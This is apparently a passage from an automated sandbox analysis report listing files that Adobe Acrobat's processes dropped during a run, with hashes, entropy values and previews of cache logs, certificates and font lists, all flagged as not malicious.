                                                                  ep_setup.exeGet hashmaliciousUnknownBrowse
                                                                  • 185.199.110.133
                                                                  No context
                                                                  No context
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):292
                                                                  Entropy (8bit):5.135405323763448
                                                                  Encrypted:false
                                                                  SSDEEP:6:PVfs3Oq2Pwkn2nKuAl9OmbnIFUt8IVfs1Zmw+IVfsnkwOwkn2nKuAl9OmbjLJ:tfs+vYfHAahFUt8ofs1/+ofsn5JfHAae
                                                                  MD5:4F12610701B27F3004B975DCEA0DB0FB
                                                                  SHA1:CB23C63DC85947C3CFA9154ADC4CB49F82212380
                                                                  SHA-256:078C0D5A2C165A891AA9714DBF70F0CDE4DBC04EE9CDFD7CE32570021E9132AC
                                                                  SHA-512:519DB85A691A12FFF0F020DC18F6034010A867600C2D8949D2A4AAF7550487F36DA3A0AAC58701FE1B79159E76144CC6166D9C795792EFB9634CD1C06C08B375
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:2024/12/20-00:18:44.730 1e44 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/20-00:18:44.732 1e44 Recovering log #3.2024/12/20-00:18:44.732 1e44 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):292
                                                                  Entropy (8bit):5.135405323763448
                                                                  Encrypted:false
                                                                  SSDEEP:6:PVfs3Oq2Pwkn2nKuAl9OmbnIFUt8IVfs1Zmw+IVfsnkwOwkn2nKuAl9OmbjLJ:tfs+vYfHAahFUt8ofs1/+ofsn5JfHAae
                                                                  MD5:4F12610701B27F3004B975DCEA0DB0FB
                                                                  SHA1:CB23C63DC85947C3CFA9154ADC4CB49F82212380
                                                                  SHA-256:078C0D5A2C165A891AA9714DBF70F0CDE4DBC04EE9CDFD7CE32570021E9132AC
                                                                  SHA-512:519DB85A691A12FFF0F020DC18F6034010A867600C2D8949D2A4AAF7550487F36DA3A0AAC58701FE1B79159E76144CC6166D9C795792EFB9634CD1C06C08B375
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:2024/12/20-00:18:44.730 1e44 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/20-00:18:44.732 1e44 Recovering log #3.2024/12/20-00:18:44.732 1e44 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):336
                                                                  Entropy (8bit):5.17872692519696
                                                                  Encrypted:false
                                                                  SSDEEP:6:PVfsJq2Pwkn2nKuAl9Ombzo2jMGIFUt8IVfsRXZmw+IVfs+kwOwkn2nKuAl9OmbX:tfsJvYfHAa8uFUt8ofsRX/+ofs+5JfHA
                                                                  MD5:4026D3F58EB99E0289FC9A0D5BAB32F1
                                                                  SHA1:8C61C958970CE5A6209A597BB3E8B85AE7AE796C
                                                                  SHA-256:F46C95E7FFB1341F980EF223E340CAC5D890C947B2F93E3F0B6E52D653247BC3
                                                                  SHA-512:59523E01172F2F0EDBB283C0859D87E5641641635F607D5E2A9FBD9B9A4856220B5FBFDE2CD00EBBDE1FB4902825DF50BF9A00D049B973BB7D8521CB1E3CB311
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:2024/12/20-00:18:44.735 1e84 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/20-00:18:44.736 1e84 Recovering log #3.2024/12/20-00:18:44.737 1e84 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):336
                                                                  Entropy (8bit):5.17872692519696
                                                                  Encrypted:false
                                                                  SSDEEP:6:PVfsJq2Pwkn2nKuAl9Ombzo2jMGIFUt8IVfsRXZmw+IVfs+kwOwkn2nKuAl9OmbX:tfsJvYfHAa8uFUt8ofsRX/+ofs+5JfHA
                                                                  MD5:4026D3F58EB99E0289FC9A0D5BAB32F1
                                                                  SHA1:8C61C958970CE5A6209A597BB3E8B85AE7AE796C
                                                                  SHA-256:F46C95E7FFB1341F980EF223E340CAC5D890C947B2F93E3F0B6E52D653247BC3
                                                                  SHA-512:59523E01172F2F0EDBB283C0859D87E5641641635F607D5E2A9FBD9B9A4856220B5FBFDE2CD00EBBDE1FB4902825DF50BF9A00D049B973BB7D8521CB1E3CB311
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:2024/12/20-00:18:44.735 1e84 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/20-00:18:44.736 1e84 Recovering log #3.2024/12/20-00:18:44.737 1e84 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):475
                                                                  Entropy (8bit):4.967403857886107
                                                                  Encrypted:false
                                                                  SSDEEP:12:YH/um3RA8sqLsBdOg2HHfcaq3QYiubInP7E4TX:Y2sRdsVdMHO3QYhbG7n7
                                                                  MD5:B7761633048D74E3C02F61AD04E00147
                                                                  SHA1:72A2D446DF757BAEA2C7A58C050925976E4C9372
                                                                  SHA-256:1A468796D744FCA806D1F828C07E0064AB6A1FA0E31DA3A403F12B9B89868B67
                                                                  SHA-512:397A10C510FAA048E4AAB08A11B2AE14A09EE47EC4F5A2B47CE1A9580C2874ADE0F9F8FC287B9358C0FFEA4C89F8AB9270B9CA00064EA90CD2EF0EAD0A59369F
                                                                  Malicious:false
                                                                  Reputation:moderate, very likely benign file
                                                                  Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340980889952523","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146406},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:JSON data
                                                                  Category:modified
                                                                  Size (bytes):475
                                                                  Entropy (8bit):4.9729052853641855
                                                                  Encrypted:false
                                                                  SSDEEP:12:YH/um3RA8sqb2AksBdOg2Hvcaq3QYiubInP7E4TX:Y2sRds7AJdMHe3QYhbG7n7
                                                                  MD5:CBD793F80A850B4E842E5E1B780412E3
                                                                  SHA1:3FEB3224F2C0558E47C18B38E67680C03BC962A8
                                                                  SHA-256:13E131D8C7114B5070FC48DE1E8A7CAD8F3EA03601462F304229C0E87E6C9EBA
                                                                  SHA-512:C3764DA8BB76F596811658589736019B783CEA6B7BEC02325B546E908026EA1A42904AB0319833B69569ECFC2548CF4137369456DACF7AF156D6EF4F61B17F34
                                                                  Malicious:false
                                                                  Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379231937160021","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":644650},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):475
                                                                  Entropy (8bit):4.967403857886107
                                                                  Encrypted:false
                                                                  SSDEEP:12:YH/um3RA8sqLsBdOg2HHfcaq3QYiubInP7E4TX:Y2sRdsVdMHO3QYhbG7n7
                                                                  MD5:B7761633048D74E3C02F61AD04E00147
                                                                  SHA1:72A2D446DF757BAEA2C7A58C050925976E4C9372
                                                                  SHA-256:1A468796D744FCA806D1F828C07E0064AB6A1FA0E31DA3A403F12B9B89868B67
                                                                  SHA-512:397A10C510FAA048E4AAB08A11B2AE14A09EE47EC4F5A2B47CE1A9580C2874ADE0F9F8FC287B9358C0FFEA4C89F8AB9270B9CA00064EA90CD2EF0EAD0A59369F
                                                                  Malicious:false
                                                                  Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340980889952523","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146406},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):475
                                                                  Entropy (8bit):4.967403857886107
                                                                  Encrypted:false
                                                                  SSDEEP:12:YH/um3RA8sqLsBdOg2HHfcaq3QYiubInP7E4TX:Y2sRdsVdMHO3QYhbG7n7
                                                                  MD5:B7761633048D74E3C02F61AD04E00147
                                                                  SHA1:72A2D446DF757BAEA2C7A58C050925976E4C9372
                                                                  SHA-256:1A468796D744FCA806D1F828C07E0064AB6A1FA0E31DA3A403F12B9B89868B67
                                                                  SHA-512:397A10C510FAA048E4AAB08A11B2AE14A09EE47EC4F5A2B47CE1A9580C2874ADE0F9F8FC287B9358C0FFEA4C89F8AB9270B9CA00064EA90CD2EF0EAD0A59369F
                                                                  Malicious:false
                                                                  Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340980889952523","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146406},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):4730
                                                                  Entropy (8bit):5.252505940859717
                                                                  Encrypted:false
                                                                  SSDEEP:96:etJCV4FAsszrNamjTN/2rjYMta02fDtehgO7BtTgo7KqY4q+Z:etJCV4FiN/jTN/2r8Mta02fEhgO73gov
                                                                  MD5:D402D1E24EACCA8F92A4F571F06A2B38
                                                                  SHA1:07438FC14682DF6E497800C050A26EC51E415104
                                                                  SHA-256:0582AB766E7DDC05D4E8BE0C393EA000C724DF85990B9A119B27749A6FF3216E
                                                                  SHA-512:84C431554F8DDD6562AD2039C9223023D1663CEC21F879128B03DD61ED14BBEB4B7F9EC07C816D53F854757A0FBDAFBB489F1CAE008D4E0C9A2A267A273960FB
                                                                  Malicious:false
                                                                  Preview:*...#................version.1..namespace-['O.o................next-map-id.1.Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/.0>...r................next-map-id.2.Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/.1O..r................next-map-id.3.Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/.2.\.o................next-map-id.4.Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/.3....^...............Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/..|.^...............Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/n..Fa...............Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/DQ..a...............Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/i.`do................next-map-id.5.Pnamespace-de635bf2_6773_4d83_ad16_
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):324
                                                                  Entropy (8bit):5.189357317678
                                                                  Encrypted:false
                                                                  SSDEEP:6:PVfslYq2Pwkn2nKuAl9OmbzNMxIFUt8IVfs/pZmw+IVfsakwOwkn2nKuAl9OmbzE:tfslYvYfHAa8jFUt8ofsB/+ofsa5JfHP
                                                                  MD5:112BF0839995C67891020969D9DBA5D5
                                                                  SHA1:4FE2FFFA6FE13325DBBE79BBB714678C69CEF82C
                                                                  SHA-256:29B17E5B79BB4D3FA22BBA4AE71244A12B70E68C62D77DA7AE03AE16F76259C3
                                                                  SHA-512:369448EFB64C2C59350B2B4545602FEC1200CB2A9A92F8093B765E2A03A54E1095C30C8C763940452BA83C909E644AB0E1A7209062DBB1DA35505766F79EBE1F
                                                                  Malicious:false
                                                                  Preview:2024/12/20-00:18:44.954 1e84 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/20-00:18:44.956 1e84 Recovering log #3.2024/12/20-00:18:44.957 1e84 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):324
                                                                  Entropy (8bit):5.189357317678
                                                                  Encrypted:false
                                                                  SSDEEP:6:PVfslYq2Pwkn2nKuAl9OmbzNMxIFUt8IVfs/pZmw+IVfsakwOwkn2nKuAl9OmbzE:tfslYvYfHAa8jFUt8ofsB/+ofsa5JfHP
                                                                  MD5:112BF0839995C67891020969D9DBA5D5
                                                                  SHA1:4FE2FFFA6FE13325DBBE79BBB714678C69CEF82C
                                                                  SHA-256:29B17E5B79BB4D3FA22BBA4AE71244A12B70E68C62D77DA7AE03AE16F76259C3
                                                                  SHA-512:369448EFB64C2C59350B2B4545602FEC1200CB2A9A92F8093B765E2A03A54E1095C30C8C763940452BA83C909E644AB0E1A7209062DBB1DA35505766F79EBE1F
                                                                  Malicious:false
                                                                  Preview:2024/12/20-00:18:44.954 1e84 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/20-00:18:44.956 1e84 Recovering log #3.2024/12/20-00:18:44.957 1e84 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:PC bitmap, Windows 3.x format, 117 x -152 x 32, cbSize 71190, bits offset 54
                                                                  Category:dropped
                                                                  Size (bytes):71190
                                                                  Entropy (8bit):1.3953934891383017
                                                                  Encrypted:false
                                                                  SSDEEP:96:eWaCxzSrSGH5nMgO0sTAGAQW/i0uZFZTzW4D1hWT9:eWaCxIcMbV
                                                                  MD5:55824CAD2CFA393A85A7D890BCBE40FB
                                                                  SHA1:CF0BC387903CC8AD019C810BB3BADBAD9D1ECB48
                                                                  SHA-256:41785E3596E0DFE2E4B5B5DEDCC2DCBC9520F4DFC77DE2920D984B73A0CA0AE7
                                                                  SHA-512:68940434A83C1DE9AD9D93A5F84E2951E88B5D8865BF78025A9574BF38071D97C95C856179E33E92989DA24129C0D724F351EA6D4442A94A711C56687DCA473F
                                                                  Malicious:false
                                                                  Preview:BM........6...(...u...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 15, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 15
                                                                  Category:dropped
                                                                  Size (bytes):86016
                                                                  Entropy (8bit):4.444953920244281
                                                                  Encrypted:false
                                                                  SSDEEP:384:yezci5tUiBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:rDs3OazzU89UTTgUL
                                                                  MD5:3554FAEEAE0BA10428E689B5C81C86B7
                                                                  SHA1:5AD5CEA23948C29B6F525B2C90F83A5F06AA5407
                                                                  SHA-256:E8B23DD7C4C893412CFAFBFDDC851D0C457CA927DCED448CBA91E95A49382D87
                                                                  SHA-512:5E1D4687A584F32F2C17C40430BB03270F8BD18B56E7AD5325F10C2A0AFB033A39C6E7BAE898E44A461F8C72DB1FBAA1C8A573A8D3AEAD5C54728EA0B12CD00E
                                                                  Malicious:false
                                                                  Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:SQLite Rollback Journal
                                                                  Category:dropped
                                                                  Size (bytes):8720
                                                                  Entropy (8bit):3.7749987128447833
                                                                  Encrypted:false
                                                                  SSDEEP:48:7MHUp/E2ioyVnOioy9oWoy1Cwoy1qdKOioy1noy1AYoy1Wioy1hioybioyEvoy1x:7WUpjunOFRPXKQ7d1b9IVXEBodRBkZ
                                                                  MD5:D4FE1CE5A654313D7B8B538EAA547A33
                                                                  SHA1:B619BB939226E16A3DAF7CAC1485E569A04A9EF0
                                                                  SHA-256:26781B83FCB4EAC9B0C81F8DDD36FF0BD510A6E7F7265BE250603A3D5D9BAC54
                                                                  SHA-512:0FC85CCDD1B7D9B01C6AFAA5162D63ED8DC27220E7D722B27A1F56DB6B82505C5CC17EC8E3FFBCCD21A429AF717459CF3173B79C2746424619940D5478E18D4B
                                                                  Malicious:false
                                                                  Preview:.... .c.....B..3...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b...r...t...}.....L..............................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:Certificate, Version=3
                                                                  Category:dropped
                                                                  Size (bytes):1391
                                                                  Entropy (8bit):7.705940075877404
                                                                  Encrypted:false
                                                                  SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                  MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                  SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                  SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                  SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                  Malicious:false
                                                                  Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                  Category:dropped
                                                                  Size (bytes):71954
                                                                  Entropy (8bit):7.996617769952133
                                                                  Encrypted:true
                                                                  SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                  MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                  SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                  SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                  SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                  Malicious:false
                                                                  Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):192
                                                                  Entropy (8bit):2.7673182398396405
                                                                  Encrypted:false
                                                                  SSDEEP:3:kkFklX0UlfllXlE/HT8klLllltNNX8RolJuRdxLlGB9lQRYwpDdt:kKbNT8sLVNMa8RdWBwRd
                                                                  MD5:35343588EC9FB304A80AFDCC3C5AD25F
                                                                  SHA1:7AC8A276911BBCF7533B9BF15AA1E1B377EC4574
                                                                  SHA-256:4B288F5801EC948C0A825C980CC1E77AAD94ACDE8D049B760B249A27C1D4B9DE
                                                                  SHA-512:599EA836C0395ACE9913ADC3FF211472368E82CDD4C37F08034CD1639824D291456E61A192CA064FAF914996B55727255DBC15C5699E31EF63E04DC99B2329FD
                                                                  Malicious:false
                                                                  Preview:p...... ........$Q...R..(....................................................... ..........W....................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:data
                                                                  Category:modified
                                                                  Size (bytes):328
                                                                  Entropy (8bit):3.2478978672539016
                                                                  Encrypted:false
                                                                  SSDEEP:6:kKtElD9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:ylaDImsLNkPlE99SNxAhUe/3
                                                                  MD5:63019B0E561570808C8E31F35356DBF0
                                                                  SHA1:7E3562BD5EDF021E711755F0DDDF020104549AFD
                                                                  SHA-256:A7444C1AB4F6B480023FCA74059EA2FD21DF069692ADB4B31CDE5B5176A2A071
                                                                  SHA-512:F5070004CD28DDBF2AA6E7E4D939E5B4EADF0101E7BA1A7449CCCD3D01819AC593CB3C35B6090DCC0725BA84BB1BADC60F6D98E8A24B44985B2317DDFC5506EA
                                                                  Malicious:false
                                                                  Preview:p...... ...........R..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:PostScript document text
                                                                  Category:dropped
                                                                  Size (bytes):185099
                                                                  Entropy (8bit):5.182478651346149
                                                                  Encrypted:false
                                                                  SSDEEP:1536:JsVoWFMWQNk1KUQII5J5lZRT95tFiQibVJDS+Stu/3IVQBrp3Mv9df0CXLhNHqTM:bViyFXE07ZmandGCyN2mM7IgOP0gC
                                                                  MD5:94185C5850C26B3C6FC24ABC385CDA58
                                                                  SHA1:42F042285037B0C35BC4226D387F88C770AB5CAA
                                                                  SHA-256:1D9979A98F7C4B3073BC03EE9D974CCE9FE265A1E2F8E9EE26A4A5528419E808
                                                                  SHA-512:652657C00DD6AED1A132E1DFD0B97B8DF233CDC257DA8F75AC9F2428F2F7715186EA8B3B24F8350D409CC3D49AFDD36E904B077E28B4AD3E4D08B4DBD5714344
                                                                  Malicious:false
                                                                  Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Reg.FamilyName:Agency FB.StyleName:Regular.MenuName:Agency FB.StyleBits:0.WeightClass:400.WidthClass:3.AngleClass:0.FullName:Agency FB.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB.FileLength:58920.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Bold.FamilyName:Agency FB.StyleName:Bold.MenuName:Agency FB.StyleBits:2.WeightClass:700.WidthClass:3.AngleClass:0.FullName:Agency FB Bold.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB Bold.FileLength:60656.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB Bold.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Algerian.FamilyName:Algerian.StyleName:Regular.MenuName:Algerian.StyleBits:0.We
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:PostScript document text
                                                                  Category:dropped
                                                                  Size (bytes):10880
                                                                  Entropy (8bit):5.214360287289079
                                                                  Encrypted:false
                                                                  SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                  MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                  SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                  SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                  SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                  Malicious:false
